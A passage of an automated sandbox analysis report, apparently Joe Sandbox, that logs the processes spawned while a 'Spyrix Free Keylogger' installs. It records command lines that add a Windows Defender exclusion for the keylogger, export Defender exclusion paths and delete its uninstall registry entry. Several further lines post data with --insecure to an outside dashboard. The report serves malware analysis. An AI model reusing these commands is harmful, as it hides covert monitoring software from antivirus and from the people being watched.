                                                                                                                                                                                                                                                          Commandline:powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
                                                                                                                                                                                                                                                          Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                                          Start time:01:58:05
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd
                                                                                                                                                                                                                                                          Imagebase:0x7ff710960000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                                          Start time:01:58:05
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                                          Start time:01:58:05
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y
                                                                                                                                                                                                                                                          Imagebase:0x7ff7a5230000
                                                                                                                                                                                                                                                          File size:77'312 bytes
                                                                                                                                                                                                                                                          MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                                                                                          Start time:01:58:10
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
                                                                                                                                                                                                                                                          Imagebase:0xa30000
                                                                                                                                                                                                                                                          File size:74'240 bytes
                                                                                                                                                                                                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                                                                                          Start time:01:58:10
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:46
                                                                                                                                                                                                                                                          Start time:01:58:11
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F
                                                                                                                                                                                                                                                          Imagebase:0xa30000
                                                                                                                                                                                                                                                          File size:74'240 bytes
                                                                                                                                                                                                                                                          MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:47
                                                                                                                                                                                                                                                          Start time:01:58:11
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:48
                                                                                                                                                                                                                                                          Start time:01:58:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1"
                                                                                                                                                                                                                                                          Imagebase:0xe90000
                                                                                                                                                                                                                                                          File size:329'728 bytes
                                                                                                                                                                                                                                                          MD5 hash:BD63D72DB4FA96A1E0250B1D36B7A827
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:49
                                                                                                                                                                                                                                                          Start time:01:58:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f
                                                                                                                                                                                                                                                          Imagebase:0x160000
                                                                                                                                                                                                                                                          File size:59'392 bytes
                                                                                                                                                                                                                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                          Start time:01:58:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                          Start time:01:58:25
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:5'346'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:11ADE4625528B6E7E1601681867E094E
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                          Start time:01:58:26
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                          File size:147'456 bytes
                                                                                                                                                                                                                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                          Start time:01:58:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c plist.cmd
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                                          Start time:01:58:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                                          Start time:01:58:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:chcp 65001
                                                                                                                                                                                                                                                          Imagebase:0x850000
                                                                                                                                                                                                                                                          File size:12'800 bytes
                                                                                                                                                                                                                                                          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                                          Start time:01:58:27
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:timeout 20
                                                                                                                                                                                                                                                          Imagebase:0x960000
                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:59
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:timeout 6
                                                                                                                                                                                                                                                          Imagebase:0x960000
                                                                                                                                                                                                                                                          File size:25'088 bytes
                                                                                                                                                                                                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:60
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse"
                                                                                                                                                                                                                                                          Imagebase:0x410000
                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:61
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:62
                                                                                                                                                                                                                                                          Start time:01:58:30
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:netstat.exe -e
                                                                                                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                                                                                                          File size:32'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:64
                                                                                                                                                                                                                                                          Start time:01:58:36
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:65
                                                                                                                                                                                                                                                          Start time:01:58:38
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:3'588'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:66
                                                                                                                                                                                                                                                          Start time:01:58:38
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                          Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:67
                                                                                                                                                                                                                                                          Start time:01:58:38
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:69
                                                                                                                                                                                                                                                          Start time:01:58:41
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:3'588'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:70
                                                                                                                                                                                                                                                          Start time:01:58:42
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:71
                                                                                                                                                                                                                                                          Start time:01:58:42
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:3'588'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:72
                                                                                                                                                                                                                                                          Start time:01:58:42
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                                          Start time:01:58:42
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          File size:2'012'072 bytes
                                                                                                                                                                                                                                                          MD5 hash:C0E67E8723775249CA0AE2C52E7EDD9E
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000049.00000000.3114492355.0000000000401000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                                          Start time:01:58:44
                                                                                                                                                                                                                                                          Start date:02/10/2024
                                                                                                                                                                                                                                                          Path:C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions
                                                                                                                                                                                                                                                          Imagebase:0x230000
                                                                                                                                                                                                                                                          File size:3'588'216 bytes
                                                                                                                                                                                                                                                          MD5 hash:D9EA512EE580ECFFEE587A4C3759527F
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                                          Start time:01:58:44
